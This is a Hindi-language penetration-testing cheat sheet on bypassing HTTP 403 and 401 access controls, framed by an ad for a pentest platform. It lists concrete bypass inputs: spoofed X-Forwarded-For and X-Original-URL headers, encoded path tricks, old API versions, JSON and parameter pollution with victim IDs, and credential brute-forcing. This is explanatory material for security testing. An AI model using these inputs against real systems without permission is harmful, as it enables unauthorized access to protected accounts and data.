403 & 401 Bypasses
सुरक्षा आकलन और पेनेट्रेशन टेस्टिंग के लिए तुरंत उपलब्ध सेटअप। कहीं से भी 20+ टूल और सुविधाओं के साथ पूर्ण पेनटेस्ट चलाएं जो पुनरीक्षण से रिपोर्टिंग तक जाते हैं। हम पेनटेस्टर्स को बदलने नहीं देते हैं - हम उन्हें वापस कुछ समय देने के लिए कस्टम टूल, पता लगाने और शोषण मॉड्यूल विकसित करते हैं ताकि वे गहराई में खोजें, शैल्स पॉप करें और मजा करें।
HTTP Verbs/Methods Fuzzing
फ़ाइल तक पहुंचने के लिए विभिन्न verbs का उपयोग करने की कोशिश करें: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK
प्रतिक्रिया हेडर्स की जाँच करें, शायद कुछ जानकारी दी जा सकती है। उदाहरण के लिए, HEAD के लिए 200 प्रतिक्रिया में
Content-Length: 55
का मतलब है कि HEAD verb सूचना तक पहुंच सकता है। लेकिन फिर भी आपको उस सूचना को बाहर निकालने का एक तरीका ढूंढना होगा।X-HTTP-Method-Override: PUT
जैसा HTTP हेडर उपयोग करने से उपयोग किए गए verb को अधिलेखित किया जा सकता है।TRACE
verb का उपयोग करें और यदि आप बहुत भाग्यशाली हैं तो शायद प्रतिक्रिया में आपको इंटरमीडिएट प्रॉक्सी द्वारा जोड़े गए हेडर्स भी दिख सकते हैं जो उपयोगी हो सकते हैं।
HTTP Headers Fuzzing
Host हेडर को किसी अर्बिट्रेरी मान पर बदलें (जो यहाँ काम करता था)
संसाधन तक पहुंचने के लिए अन्य उपयोगकर्ता एजेंट का प्रयास करें।
Fuzz HTTP Headers: HTTP Proxy Headers, HTTP Authentication Basic और NTLM brute-force (कुछ कम्बिनेशन के साथ केवल) और अन्य तकनीकों का प्रयास करें। इस सब के लिए मैंने उपकरण fuzzhttpbypass बनाया है।
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded: 127.0.0.1
Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
X-Original-URL: 127.0.0.1
Client-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Cluster-Client-IP: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
Host: localhost
यदि पथ संरक्षित है तो आप इन अन्य हेडर्स का उपयोग करके पथ संरक्षण को बायपास करने का प्रयास कर सकते हैं:
X-Original-URL: /admin/console
X-Rewrite-URL: /admin/console
यदि पृष्ठ प्रॉक्सी के पीछे है, शायद यह प्रॉक्सी है जो आपको निजी जानकारी तक पहुंचने से रोक रहा है। HTTP Request Smuggling का दुरुपयोग करने का प्रयास करें या hop-by-hop headers** का दुरुपयोग करें।**
विभिन्न प्रतिक्रिया के लिए खोजने के लिए विशेष HTTP हेडर्स को फज़ करें।
HTTP Methods को फज़ करते समय विशेष HTTP हेडर्स को फज़ करें।
Host हेडर को हटाएं और शायद आप संरक्षण को बायपास कर सकें।
पथ फज़िंग
यदि /पथ ब्लॉक है:
/%2e/path _(यदि पहुंच को प्रॉक्सी द्वारा ब्लॉक किया गया है, तो यह संरक्षण को बायपास कर सकता है)। आजमाएं भी_** /%252e**/path (डबल URL एन्कोड)
यूनिकोड बायपास का प्रयास करें: /%ef%bc%8fpath (यूआरएल एन्कोडेड वर्ण "/") इसलिए जब वापस एन्कोड किया जाएगा तो यह //path हो जाएगा और शायद आपने पहले ही /पथ नाम की जाँच को बायपास कर लिया होगा।
अन्य पथ बायपास:
site.com/secret –> HTTP 403 Forbidden
site.com/SECRET –> HTTP 200 OK
site.com/secret/ –> HTTP 200 OK
site.com/secret/. –> HTTP 200 OK
site.com//secret// –> HTTP 200 OK
site.com/./secret/.. –> HTTP 200 OK
site.com/;/secret –> HTTP 200 OK
site.com/.;/secret –> HTTP 200 OK
site.com//;//secret –> HTTP 200 OK
site.com/secret.json –> HTTP 200 OK (ruby)
इस सूची का प्रयोग करें निम्नलिखित स्थितियों में:
/FUZZsecret
/FUZZ/secret
/secretFUZZ
अन्य API बायपास:
/v3/users_data/1234 --> 403 Forbidden
/v1/users_data/1234 --> 200 OK
{“id”:111} --> 401 Unauthriozied
{“id”:[111]} --> 200 OK
{“id”:111} --> 401 Unauthriozied
{“id”:{“id”:111}} --> 200 OK
{"user_id":"<legit_id>","user_id":"<victims_id>"} (JSON Parameter Pollution)
user_id=ATTACKER_ID&user_id=VICTIM_ID (Parameter Pollution)
पैरामीटर मैनिपुलेशन
पैरामीटर मान बदलें:
id=123
-->id=124
URL में अतिरिक्त पैरामीटर जोड़ें:
?
id=124
—->id=124&isAdmin=true
पैरामीटर हटाएं
पैरामीटरों को पुनः क्रमबद्ध करें
विशेष वर्ण उपयोग करें।
पैरामीटर में सीमा परीक्षण करें — -234 या 0 या 99999999 जैसे मान प्रदान करें (कुछ उदाहरण मान।)
प्रोटोकॉल संस्करण
यदि HTTP/1.1 का उपयोग किया जा रहा है तो 1.0 का उपयोग करने का प्रयास करें या यह भी जांचें कि क्या यह 2.0 का समर्थन करता है।
अन्य बायपास
डोमेन का आईपी या सीनाम प्राप्त करें और उससे सीधे संपर्क करने का प्रयास करें।
सर्वर को तनाव दें और सामान्य GET अनुरोध भेजें (यह व्यक्ति के लिए काम कर गया था फेसबुक पर)।
प्रोटोकॉल बदलें: http से https में, या https से http में
https://archive.org/web/ पर जाएं और जांचें कि क्या पिछले में उस फ़ाइल को विश्वस्तरीय रूप से पहुंचने में सफल रहा था।
ब्रूट फ़ोर्स
पासवर्ड की अनुमानित प्रक्रिया: निम्नलिखित सामान्य क्रेडेंशियल का परीक्षण करें। क्या आप पीड़ित के बारे में कुछ जानते हैं? या CTF चैलेंज का नाम?
ब्रूट फ़ोर्स: मूल, डाइजेस्ट और NTLM प्रमाणीकरण का प्रयास करें।
स्वचालित उपकरण
तत्काल उपलब्ध सेटअप विकल्प सुरक्षा मूल्यांकन और पेनेट्रेशन टेस्टिंग के लिए। कहीं से भी 20+ उपकरण और सुविधाओं के साथ एक पूर्ण पेनटेस्ट चलाएं जो पुनरीक्षण से रिपोर्टिंग तक जाते हैं। हम पेनटेस्टर्स को बदलने नहीं जाते - हम उन्हें वापस कुछ समय देने के लिए कस्टम उपकरण, पता लगाने और शोषण मॉड्यूल विकसित करते हैं ताकि वे गहराई में खोज कर सकें, शैल्स पॉप कर सकें, और मज़ा कर सकें।
Last updated